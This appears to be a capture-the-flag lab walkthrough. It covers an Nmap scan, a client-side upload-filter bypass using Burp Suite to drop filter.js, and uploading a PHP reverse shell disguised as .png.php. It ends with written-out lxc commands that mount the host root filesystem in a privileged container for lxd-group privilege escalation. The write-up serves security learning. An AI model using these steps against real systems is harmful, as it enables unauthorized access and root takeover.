Nmap done: 1 IP address (1 host up) scanned in 73.86 seconds
- Scan the machine. What ports are open?
80, 65000
- What's the title of the hidden website? It's worthwhile looking recursively at all websites on the box for this step.
Light Cycle
- What is the name of the hidden php page?
- What is the name of the hidden directory where file uploads are saved?
Make sure Burp Suite is set to intercept JavaScript files: in the Proxy options, remove js from the list of file extensions that intercept skips.
Rename the PHP reverse shell to .png.php.
Turn on intercept in Burp Suite and press Ctrl+F5 to reload the web page and catch the requests.
Hit forward, then forward again for the next request.
Drop the request for filter.js: the upload filter runs client side in that file, so if it never loads the upload is not filtered.
- What is the value of the web.txt flag?
- Review the configuration files for the webserver to find some useful loot in the form of credentials. What credentials do you find? username:password
- Access the database and discover the encrypted credentials. What is the name of the database you find these in?
- Crack the password. What is it?
- What is the value of the user.txt flag?
- Check the user's groups. Which group can be leveraged to escalate privileges?
- What is the value of the root.txt flag?
Now, in order to escalate privileges, we have to clone lxd-alpine-builder.git on our local machine and build the Alpine image; this route works because the user is in the lxd group.
Make sure you run the build as root (the build script requires it).
Transfer the resulting tar file to the target machine through wget, a Python HTTP server or netcat. I used netcat.
Now run these commands:
lxc image import ./alpine-v3.12-x86_64-20201225_0216.tar.gz --alias myimage
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
Then navigate to /mnt/root/root inside the container, which is the host's /root directory, and read root.txt.